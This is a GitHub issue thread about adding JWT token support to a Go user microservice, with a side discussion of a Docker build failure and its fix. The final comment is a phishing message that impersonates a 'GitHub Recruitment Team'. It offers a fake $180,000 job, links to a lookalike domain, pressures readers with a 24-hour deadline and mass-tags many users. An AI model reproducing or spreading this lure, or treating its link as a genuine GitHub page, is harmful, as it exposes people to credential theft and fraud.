### ISSUE TITLE
Add JWT token support

### ISSUE THREAD

**Issue by jamesmawm** [jamesmawm/golang-user-microservice#8]
Add support to generate and validate JWT tokens.
JWT tokens are generated when a user logs in with a username and password.

**Comment by karimelazzouni** [comment]
Will work on this 😃

**Comment by karimelazzouni** [comment]
@jamesmawm I don't exactly understand the requirement here. The application doesn't have an authentication flow to login with username and password. Is is expected to be a part of this issue? Or should the JWT token be generated when hitting the `ping` API endpoint?

**Comment by jamesmawm** [comment]
You're right, as this issue #8 is only applicable when the endpoints in issue #4 are implemented.
In the interim, you can add in the supporting JWT functions using example/dummy strings.
Assume that some username and password to sent to a `/api/login` endpoint, which returns a JWT token.
An example payload could be:
```
{
  "sub": "1234567890",
  "name": "John Doe",
}
```

Once the endpoints in #4 are implmeneted, we can integrate with your JWT support to produce a working solution.

**Comment by karimelazzouni** [comment]
Hey @jamesmawm , spent a couple of hours today trying to get the latest version of the service to run on `docker-compose` but couldn't. 

Firstly had problems with `go mod download` because the `go.mod` file was omitted from the docker image; fixed that by removing `go.mod` and `go.sum` from the `.dockerignore` file.

However, now the service would never start when running `docker-compose up -d` with the following very vague error message

```
ERROR: Service 'user-service' failed to build: The command '/bin/sh -c go mod download &&    go mod vendor &&    go build -v &&    rm -rf vendor &&    mv golang-user-microservice server' returned a non-zero code: 2
```

I am also seeing the same error when just trying out `docker build .`.

Are you able to run the docker container locally? Is the `README` missing any dependencies?

**Comment by jamesmawm** [comment]
Hey @karimelazzouni, thanks for bringing this across! I got the same errors too.
I've applied your fix, along with adding a gcc dependency needed by some of the packages, in PR #21.
After pulling the latest from the `main` branch, your docker should be good running up.

**Comment by apocanow1** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
thinhlam, @woniuxu, @timestee, @pterolex, @sheldonzhao, @highkay, @renanliberato, @rhacker, @splix, @hutpond, @guyeilam, @XuTuKe, @fanghuaqi, @rafaellx10, @Rasphino, @oelizondo, @laoshuterry, @calvin2021y, @EnoRage, @euynus
